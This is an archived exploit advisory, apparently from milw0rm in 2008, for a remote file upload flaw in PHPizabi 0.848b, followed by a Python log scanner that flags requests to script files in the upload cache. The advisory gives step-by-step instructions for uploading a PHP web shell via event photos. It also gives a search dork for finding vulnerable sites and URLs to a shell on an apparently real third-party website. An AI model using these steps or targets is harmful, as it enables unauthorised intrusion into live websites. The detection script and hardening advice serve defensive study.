
PHPizabi 0.848b C1 HFP1 Remote File Upload Vulnerability

############################################
Powered by PHPizabi v0.848b C1 HFP1 remote file upload

author: ZoRLu

home: www.yildirimordulari.org

contact: trt-turk@hotmail.com

dork: "Powered by PHPizabi v0.848b C1 HFP1"

############################################

exploit:

http://localhost/izabi/system/cache/pictures/id_shell.php

- First, register on the web site.

- Click to create an event (direct create event URL: http://localhost/izabi/?L=events.create)

- Write the event title and description. For "show to", select "All the users". Click the Browse ("gözat") button and upload shell.php.

- Afterwards, go to the event page. Right-click the uploaded photo, click Properties in the menu, and copy the URL.

example:

http://localhost/izabi/system/image.php?file=xxx_shell.php&width=500

and

exploit:

http://localhost/izabi/system/cache/pictures/xxx_shell.php

example web site:

http://bitchinindie.com/system/image.php?file=597_shell.php&width=500

exploit shell.php

http://bitchinindie.com/system/cache/pictures/597_shell.php


##################################################

thanx: str0ke, FaLCaTa, ReD_KaN, edish, harded, aRKi, z3h!r, the_KaM!L, vur6un, siircicocuk, Dr. SaLTuK, kasırga(lavrens), avkidis, head_hunter

and all users of yildirimordulari.org


siircicocuk, where have you been, buddy? Drop by on MSN, we miss you :)))

## whether yildirimordulari.org will open again or not, nobody knows, but one thing is known: it is a legend ##

#################################################

# milw0rm.com [2008-02-17]
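
Added example (not part of the original advisory and not PHPizabi code): the advisory shows the event photo being stored under system/cache/pictures/ with its original .php extension, so a defender can look for requests to script-named files there. The sketch below scans access-log lines for them; the combined log format, the extension list and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Extensions a PHP-enabled server may pass to the interpreter
# (assumed list; align it with your own handler configuration).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
CACHE_DIR = "/system/cache/pictures/"   # upload cache path named in the advisory
IMAGE_PHP = "/system/image.php"         # resizer endpoint named in the advisory
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')


def classify(line):
    """Return (reason, status, target) for a suspicious log line, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    target, status = m.group(1), int(m.group(2))
    url = urlsplit(target)
    path = unquote(url.path)
    # A script-named file requested directly from the picture cache.
    if CACHE_DIR in path and SCRIPT_EXT.search(path):
        return ("script-in-upload-cache", status, target)
    # The resizer being asked for a "picture" whose name is a script.
    if path.endswith(IMAGE_PHP):
        for name in parse_qs(url.query).get("file", []):
            if SCRIPT_EXT.search(name):
                return ("script-name-via-image.php", status, target)
    return None


def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines (combined log format), not taken from a real server.
SAMPLE = [
    '203.0.113.7 - - [17/Feb/2008:10:01:02 +0000] "GET /izabi/system/image.php?file=12_party.jpg&width=500 HTTP/1.1" 200 5120',
    '198.51.100.9 - - [17/Feb/2008:10:05:40 +0000] "GET /izabi/system/image.php?file=41_upload.php&width=500 HTTP/1.1" 200 312',
    '198.51.100.9 - - [17/Feb/2008:10:05:55 +0000] "GET /izabi/system/cache/pictures/41_upload.php HTTP/1.1" 200 1480',
    '203.0.113.7 - - [17/Feb/2008:10:06:10 +0000] "GET /izabi/system/cache/pictures/12_party.jpg HTTP/1.1" 200 20480',
]

if __name__ == "__main__":
    for reason, status, target in scan(SAMPLE):
        print(f"{reason:28} {status} {target}")
```

A hit with status 200 on the cache path means the file exists and was served. The corresponding hardening is to allow-list image types at upload time and to disable script execution for the upload directory in the web server configuration.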



